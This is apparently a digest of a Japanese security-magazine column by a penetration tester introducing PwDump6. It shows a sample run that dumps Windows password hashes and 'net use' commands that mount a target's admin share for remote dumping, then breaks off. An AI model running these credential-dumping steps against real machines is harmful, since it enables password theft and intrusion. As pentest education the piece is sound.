現役ペンテスト技術者が選ぶ 使えるセキュリティツール(11)「PwDumpシリーズ」 | ScanNetSecurity
2024.04.20(土)

現役ペンテスト技術者が選ぶ 使えるセキュリティツール(11)「PwDumpシリーズ」

このコーナーでは、現役のペネトレーションテスト技術者が、使えるセキュリティツールを、ペンテストの現場の視点から紹介します。

特集 特集
このコーナーでは、現役のペネトレーションテスト技術者が、使えるセキュリティツールを、ペンテストの現場の視点から紹介します。


・名称…PwDumpシリーズ

・分野…ダンピング

・配布制限…GPL

・商用版の有無…無

・類似ツール…

・DL URL…http://swamp.foofus.net/fizzgig/pwdump/

・対応OS…Windows系OS


(1) 基本項目と概要

Windows内に格納されているハッシュ化されたパスワード(以下ハッシュ値)を管理者権限を用いて取得するツールである。取得できたパスワードはハッシュ化されているので当然そのままでは使用することはできない。だが、そのハッシュ値をクラッキング(解析)するツールも存在する。そのツールに関しては別の機会に紹介する。

今回、名称に「シリーズ」と付けたのは、このツールは様々な作者の手で様々な改良を加えられ筆者の把握している限りでは「PwDump7」までリリースされているためである。(中にはPwDump3eやPwDumpXというものも存在する。)
今回は、リモートからもハッシュを取得することができるPwDump6を紹介する。


(2) コマンドサンプル

まずは、ローカルでハッシュ値の取得を行ってみよう。ローカルで実行するには管理者権限でログオンし、引数に自身のIPアドレス、もしくは、マシン名を指定し実行する。

【ローカルでのハッシュ値取得】
C: oolpwdump6>PwDump.exe 127.0.0.1

pwdump6 Version 1.0 by fizzgig and the mighty group at foofus.net
Copyright 2005 foofus.net

〜 略 〜

Administrator:500:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::
ASPNET:1003:0DFC661619C403307257C4412C76C3D6:E0DB5F12B184E1B7C428DF219D8C8542:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
IUSR_VICTIM-W2K:1001:9339643A483133C5F148CCED8419DB8C:9EEC81248556914270CBB7DB90D65F7C:::
IWAM_VICTIM-W2K:1002:54A5A4E317A3830FACC9C4E468C7207F:6077983EE0789DC1242BC8CDACFAEF51:::
TsInternetUser:1000:2F0F7C5F5264DE66462979F0C902E19B:AA44FFD5EEE101F33470A40C09835341:::
tsuji:1005:41B020478F5B4014AAD3B435B51404EE:A1059C9934521426A854BB819B6C5CC3:::
Completed.

上記のように取得され表示される内容は、一行あたり、

ユーザ名:uid:ハッシュ

という形式である。

次に、リモートからの取得である。リモートの場合でも、ローカルと同じく管理者権限が必要となる。ヘルプを見る限りでは、実行時にユーザ名とパスワードを指定することでリモートから取得できそうなのだが正しいユーザ名、パスワードを設定しても正常に動作せず、ハッシュ値を取得することはできない。そのため、別の方法で、リモートから管理者権限で対象の共有資源をマウントしておく必要がある。マウントする方法は、下記の通りである。

net use \対象のIPアドレスC$ /user:"ユーザ名" "パスワード"

または

net use \対象のIPアドレスADMIN$ /user:"ユーザ名" "パスワード"

上記コマンドを実行し「コマンドは正常に終了しました。」と表示されればマウントは成功である。PwDumpを実行し、リモートからハッシュ値を取得する準備が整ったことになる。

それでは、実行してみよう…

【執筆:NTTデータ・セキュリティ株式会社 辻 伸弘】
──
※ この記事は Scan購読会員向け記事をダイジェスト掲載しました
購読会員登録案内 http://www.ns-research.jp/cgi-bin/ct/p.cgi?w02_ssw

《ScanNetSecurity》

特集

PageTop

アクセスランキング

  1. 東芝テックが利用するクラウドサービスに不正アクセス、取引先や従業員の個人情報が閲覧された可能性

    東芝テックが利用するクラウドサービスに不正アクセス、取引先や従業員の個人情報が閲覧された可能性

  2. Windows DNS の脆弱性情報が公開

    Windows DNS の脆弱性情報が公開

  3. バッファロー製無線 LAN ルータに複数の脆弱性

    バッファロー製無線 LAN ルータに複数の脆弱性

  4. 「引っかかるのは当たり前」が前提、フィッシングハンターが提案する対策のポイント ~ JPAAWG 6th General Meeting レポート

    「引っかかるのは当たり前」が前提、フィッシングハンターが提案する対策のポイント ~ JPAAWG 6th General Meeting レポート

  5. 転職先で営業活動に活用、プルデンシャル生命保険 元社員 顧客情報持ち出し

    転職先で営業活動に活用、プルデンシャル生命保険 元社員 顧客情報持ち出し

  6. プルーフポイント、マルウェア配布する YouTube チャンネル特定

    プルーフポイント、マルウェア配布する YouTube チャンネル特定

  7. セキュリティ対策は株価を上げるのか ~ 株主総利回り(TSR)の平均値は高い傾向

    セキュリティ対策は株価を上げるのか ~ 株主総利回り(TSR)の平均値は高い傾向

  8. 東京高速道路のメールアカウントを不正利用、大量のメールを送信

    東京高速道路のメールアカウントを不正利用、大量のメールを送信

  9. 山田製作所にランサムウェア攻撃、「LockBit」が展開され複数のサーバのデータが暗号化

    山田製作所にランサムウェア攻撃、「LockBit」が展開され複数のサーバのデータが暗号化

  10. フュートレックにランサムウェア攻撃、本番環境への侵入形跡は存在せず

    フュートレックにランサムウェア攻撃、本番環境への侵入形跡は存在せず

ランキングをもっと見る